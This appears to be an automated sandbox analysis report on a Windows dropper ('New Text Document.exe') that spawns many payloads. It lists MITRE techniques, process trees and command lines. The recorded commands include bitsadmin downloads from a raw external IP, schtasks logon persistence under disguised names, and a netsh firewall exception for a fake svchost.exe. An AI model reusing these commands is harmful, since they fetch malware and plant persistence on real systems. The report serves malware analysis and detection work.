Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	TPB-1.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
5460	timeout.exe
316	timeout.exe
5908	timeout.exe
5568	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5176	wmic.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName	output.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0	output.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation	output.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
5076	PING.EXE
5456	PING.EXE
2564	PING.EXE
1264	ping.exe
3644	PING.EXE
6112	PING.EXE
5580	PING.EXE
4756	PING.EXE
5252	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3316	schtasks.exe
2212	schtasks.exe
5484	schtasks.exe
4300	schtasks.exe
5996	schtasks.exe
5204	schtasks.exe
5304	schtasks.exe
3380	schtasks.exe
2284	schtasks.exe
672	schtasks.exe
2328	schtasks.exe
5972	schtasks.exe
4488	schtasks.exe
1840	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
396	SystemCare1.0.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4436	nbea1t8.exe
4436	nbea1t8.exe
1900	msiexec.exe
1900	msiexec.exe
4092	random.exe
4092	random.exe
1592	powershell.exe
1592	powershell.exe
4092	random.exe
4092	random.exe
4092	random.exe
4092	random.exe
4092	random.exe
4092	random.exe
4092	random.exe
4092	random.exe
1592	powershell.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
2452	powershell.exe
2452	powershell.exe
2452	powershell.exe
4168	powershell.exe
4168	powershell.exe
4168	powershell.exe
2740	powershell.exe
2740	powershell.exe
2740	powershell.exe
1512	powershell.exe
1512	powershell.exe
1512	powershell.exe
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
4416	aidans.dont.run.exe
3948	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4768	New Text Document.exe
Token: SeSecurityPrivilege	1900	msiexec.exe
Token: SeCreateTokenPrivilege	2332	TcMBq5M.exe
Token: SeAssignPrimaryTokenPrivilege	2332	TcMBq5M.exe
Token: SeLockMemoryPrivilege	2332	TcMBq5M.exe
Token: SeIncreaseQuotaPrivilege	2332	TcMBq5M.exe
Token: SeMachineAccountPrivilege	2332	TcMBq5M.exe
Token: SeTcbPrivilege	2332	TcMBq5M.exe
Token: SeSecurityPrivilege	2332	TcMBq5M.exe
Token: SeTakeOwnershipPrivilege	2332	TcMBq5M.exe
Token: SeLoadDriverPrivilege	2332	TcMBq5M.exe
Token: SeSystemProfilePrivilege	2332	TcMBq5M.exe
Token: SeSystemtimePrivilege	2332	TcMBq5M.exe
Token: SeProfSingleProcessPrivilege	2332	TcMBq5M.exe
Token: SeIncBasePriorityPrivilege	2332	TcMBq5M.exe
Token: SeCreatePagefilePrivilege	2332	TcMBq5M.exe
Token: SeCreatePermanentPrivilege	2332	TcMBq5M.exe
Token: SeBackupPrivilege	2332	TcMBq5M.exe
Token: SeRestorePrivilege	2332	TcMBq5M.exe
Token: SeShutdownPrivilege	2332	TcMBq5M.exe
Token: SeDebugPrivilege	2332	TcMBq5M.exe
Token: SeAuditPrivilege	2332	TcMBq5M.exe
Token: SeSystemEnvironmentPrivilege	2332	TcMBq5M.exe
Token: SeChangeNotifyPrivilege	2332	TcMBq5M.exe
Token: SeRemoteShutdownPrivilege	2332	TcMBq5M.exe
Token: SeUndockPrivilege	2332	TcMBq5M.exe
Token: SeSyncAgentPrivilege	2332	TcMBq5M.exe
Token: SeEnableDelegationPrivilege	2332	TcMBq5M.exe
Token: SeManageVolumePrivilege	2332	TcMBq5M.exe
Token: SeImpersonatePrivilege	2332	TcMBq5M.exe
Token: SeCreateGlobalPrivilege	2332	TcMBq5M.exe
Token: SeCreateTokenPrivilege	2332	TcMBq5M.exe
Token: SeAssignPrimaryTokenPrivilege	2332	TcMBq5M.exe
Token: SeLockMemoryPrivilege	2332	TcMBq5M.exe
Token: SeIncreaseQuotaPrivilege	2332	TcMBq5M.exe
Token: SeMachineAccountPrivilege	2332	TcMBq5M.exe
Token: SeTcbPrivilege	2332	TcMBq5M.exe
Token: SeSecurityPrivilege	2332	TcMBq5M.exe
Token: SeTakeOwnershipPrivilege	2332	TcMBq5M.exe
Token: SeLoadDriverPrivilege	2332	TcMBq5M.exe
Token: SeSystemProfilePrivilege	2332	TcMBq5M.exe
Token: SeSystemtimePrivilege	2332	TcMBq5M.exe
Token: SeProfSingleProcessPrivilege	2332	TcMBq5M.exe
Token: SeIncBasePriorityPrivilege	2332	TcMBq5M.exe
Token: SeCreatePagefilePrivilege	2332	TcMBq5M.exe
Token: SeCreatePermanentPrivilege	2332	TcMBq5M.exe
Token: SeBackupPrivilege	2332	TcMBq5M.exe
Token: SeRestorePrivilege	2332	TcMBq5M.exe
Token: SeShutdownPrivilege	2332	TcMBq5M.exe
Token: SeDebugPrivilege	2332	TcMBq5M.exe
Token: SeAuditPrivilege	2332	TcMBq5M.exe
Token: SeSystemEnvironmentPrivilege	2332	TcMBq5M.exe
Token: SeChangeNotifyPrivilege	2332	TcMBq5M.exe
Token: SeRemoteShutdownPrivilege	2332	TcMBq5M.exe
Token: SeUndockPrivilege	2332	TcMBq5M.exe
Token: SeSyncAgentPrivilege	2332	TcMBq5M.exe
Token: SeEnableDelegationPrivilege	2332	TcMBq5M.exe
Token: SeManageVolumePrivilege	2332	TcMBq5M.exe
Token: SeImpersonatePrivilege	2332	TcMBq5M.exe
Token: SeCreateGlobalPrivilege	2332	TcMBq5M.exe
Token: SeCreateTokenPrivilege	2332	TcMBq5M.exe
Token: SeAssignPrimaryTokenPrivilege	2332	TcMBq5M.exe
Token: SeLockMemoryPrivilege	2332	TcMBq5M.exe
Token: SeIncreaseQuotaPrivilege	2332	TcMBq5M.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
4224	t6kzDd6.exe
2332	TcMBq5M.exe
756	msiexec.exe
756	msiexec.exe
948	Runtime Broker.exe
3416	xblkpfZ8Y4.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe
4828	chrome.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
948	Runtime Broker.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
396	SystemCare1.0.exe
5536	nobody.exe
5224	atat.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4768 wrote to memory of 4224	4768	New Text Document.exe	94
PID 4768 wrote to memory of 4224	4768	New Text Document.exe	94
PID 4768 wrote to memory of 4224	4768	New Text Document.exe	94
PID 4224 wrote to memory of 1092	4224	t6kzDd6.exe	118
PID 4224 wrote to memory of 1092	4224	t6kzDd6.exe	118
PID 4224 wrote to memory of 1092	4224	t6kzDd6.exe	118
PID 4768 wrote to memory of 2332	4768	New Text Document.exe	143
PID 4768 wrote to memory of 2332	4768	New Text Document.exe	143
PID 4768 wrote to memory of 2332	4768	New Text Document.exe	143
PID 1900 wrote to memory of 3288	1900	msiexec.exe	148
PID 1900 wrote to memory of 3288	1900	msiexec.exe	148
PID 1900 wrote to memory of 3288	1900	msiexec.exe	148
PID 2332 wrote to memory of 756	2332	TcMBq5M.exe	149
PID 2332 wrote to memory of 756	2332	TcMBq5M.exe	149
PID 2332 wrote to memory of 756	2332	TcMBq5M.exe	149
PID 4768 wrote to memory of 672	4768	New Text Document.exe	153
PID 4768 wrote to memory of 672	4768	New Text Document.exe	153
PID 4768 wrote to memory of 672	4768	New Text Document.exe	153
PID 4768 wrote to memory of 3712	4768	New Text Document.exe	155
PID 4768 wrote to memory of 3712	4768	New Text Document.exe	155
PID 4768 wrote to memory of 3712	4768	New Text Document.exe	155
PID 3712 wrote to memory of 1264	3712	tvtC9D3.exe	156
PID 3712 wrote to memory of 1264	3712	tvtC9D3.exe	156
PID 3712 wrote to memory of 1264	3712	tvtC9D3.exe	156
PID 672 wrote to memory of 3048	672	uxN4wDZ.exe	158
PID 672 wrote to memory of 3048	672	uxN4wDZ.exe	158
PID 672 wrote to memory of 3048	672	uxN4wDZ.exe	158
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 672 wrote to memory of 4212	672	uxN4wDZ.exe	159
PID 3712 wrote to memory of 4244	3712	tvtC9D3.exe	161
PID 3712 wrote to memory of 4244	3712	tvtC9D3.exe	161
PID 3712 wrote to memory of 4244	3712	tvtC9D3.exe	161
PID 4768 wrote to memory of 4436	4768	New Text Document.exe	165
PID 4768 wrote to memory of 4436	4768	New Text Document.exe	165
PID 4768 wrote to memory of 4436	4768	New Text Document.exe	165
PID 1900 wrote to memory of 4184	1900	msiexec.exe	169
PID 1900 wrote to memory of 4184	1900	msiexec.exe	169
PID 1900 wrote to memory of 2116	1900	msiexec.exe	270
PID 1900 wrote to memory of 2116	1900	msiexec.exe	270
PID 1900 wrote to memory of 2116	1900	msiexec.exe	270
PID 4768 wrote to memory of 4092	4768	New Text Document.exe	173
PID 4768 wrote to memory of 4092	4768	New Text Document.exe	173
PID 4768 wrote to memory of 4092	4768	New Text Document.exe	173
PID 2116 wrote to memory of 1592	2116	MsiExec.exe	174
PID 2116 wrote to memory of 1592	2116	MsiExec.exe	174
PID 2116 wrote to memory of 1592	2116	MsiExec.exe	174
PID 1900 wrote to memory of 396	1900	msiexec.exe	178
PID 1900 wrote to memory of 396	1900	msiexec.exe	178
PID 1900 wrote to memory of 396	1900	msiexec.exe	178
PID 1900 wrote to memory of 5072	1900	msiexec.exe	227
PID 1900 wrote to memory of 5072	1900	msiexec.exe	227
PID 1900 wrote to memory of 5072	1900	msiexec.exe	227
PID 5072 wrote to memory of 4520	5072	MSI98D8.tmp	180
PID 5072 wrote to memory of 4520	5072	MSI98D8.tmp	180
PID 5072 wrote to memory of 4520	5072	MSI98D8.tmp	180
PID 4520 wrote to memory of 4488	4520	cmd.exe	182

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4824	attrib.exe

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Users\Admin\AppData\Local\Temp\a\t6kzDd6.exe
  "C:\Users\Admin\AppData\Local\Temp\a\t6kzDd6.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 752
    3⤵
    - Program crash
    PID:916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 800
    3⤵
    - Program crash
    PID:3144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 828
    3⤵
    - Program crash
    PID:540
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 904
    3⤵
    - Program crash
    PID:2912
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 912
    3⤵
    - Program crash
    PID:1064
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 832
    3⤵
    - Program crash
    PID:3628
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1140
    3⤵
    - Program crash
    PID:5088
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1164
    3⤵
    - Program crash
    PID:4704
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1244
    3⤵
    - Program crash
    PID:1436
- - C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe
    "C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 548
      4⤵
      Program crash
      PID:704
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 784
      4⤵
      Program crash
      PID:3636
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 824
      4⤵
      Program crash
      PID:4372
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 864
      4⤵
      Program crash
      PID:1324
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 904
      4⤵
      Program crash
      PID:5112
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 936
      4⤵
      Program crash
      PID:5040
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1048
      4⤵
      Program crash
      PID:3824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 1172
      4⤵
      Program crash
      PID:1080
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1092 -s 788
      4⤵
      Program crash
      PID:1420
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1296
    3⤵
    - Program crash
    PID:4788
- C:\Users\Admin\AppData\Local\Temp\a\TcMBq5M.exe
  "C:\Users\Admin\AppData\Local\Temp\a\TcMBq5M.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2332
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\a\TcMBq5M.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1732583461 " AI_EUIMSI=""
    3⤵
    - Enumerates connected drives
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    PID:756
- C:\Users\Admin\AppData\Local\Temp\a\uxN4wDZ.exe
  "C:\Users\Admin\AppData\Local\Temp\a\uxN4wDZ.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:672
- - C:\Users\Admin\AppData\Local\Temp\a\uxN4wDZ.exe
    "C:\Users\Admin\AppData\Local\Temp\a\uxN4wDZ.exe"
    3⤵
    - Executes dropped EXE
    PID:3048
- - C:\Users\Admin\AppData\Local\Temp\a\uxN4wDZ.exe
    "C:\Users\Admin\AppData\Local\Temp\a\uxN4wDZ.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4212
- C:\Users\Admin\AppData\Local\Temp\a\tvtC9D3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tvtC9D3.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3712
- - C:\Windows\SysWOW64\ping.exe
    ping -n 1 8.8.8.8
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:1264
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:4244
- - C:\Windows\SysWOW64\bitsadmin.exe
    bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:3924
- C:\Users\Admin\AppData\Local\Temp\a\nbea1t8.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nbea1t8.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4436
- C:\Users\Admin\AppData\Local\Temp\a\random.exe
  "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
  2⤵
  - Enumerates VirtualBox registry keys
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4092
- C:\Users\Admin\AppData\Local\Temp\a\22.exe
  "C:\Users\Admin\AppData\Local\Temp\a\22.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  PID:1644
- C:\Users\Admin\AppData\Local\Temp\a\SGVP%20Client%20Users.exe
  "C:\Users\Admin\AppData\Local\Temp\a\SGVP%20Client%20Users.exe"
  2⤵
  - Executes dropped EXE
  PID:4376
- C:\Users\Admin\AppData\Local\Temp\a\Registry.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Registry.exe"
  2⤵
  - Executes dropped EXE
  PID:3608
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2284
- - C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:948
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:672
- C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe
  "C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3316
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4mGvyH2OvLBn.bat" "
    3⤵
    PID:856
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2144
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3644
  - - C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe
      "C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:2116
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xeOfQiDTflOY.bat" "
        5⤵
        
        PID:5500
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:5520
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5076
      - C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6004
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qt7Og8N3CAm8.bat" "
        7⤵
        
        PID:5124
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:5480
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5456
        
        C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1824
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5996
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RBJU3UVCs50r.bat" "
        9⤵
        
        PID:5284
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:2768
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5596
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEj70WZEj2ln.bat" "
        11⤵
        
        PID:5952
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:5112
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4756
        
        C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6052
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TDh5CeM8S4U2.bat" "
        13⤵
        
        PID:2572
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:5256
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\seksiak.exe"
        14⤵
        
        PID:212
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3380
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WfsfRF1FmJm5.bat" "
        15⤵
        
        PID:6132
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:6096
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2564
- C:\Users\Admin\AppData\Local\Temp\a\dsd.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dsd.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1088
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5612
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:4956
- C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:2332
- C:\Users\Admin\AppData\Local\Temp\a\output.exe
  "C:\Users\Admin\AppData\Local\Temp\a\output.exe"
  2⤵
  - Looks for VirtualBox Guest Additions in registry
  - Looks for VMWare Tools registry key
  - Checks BIOS information in registry
  - Executes dropped EXE
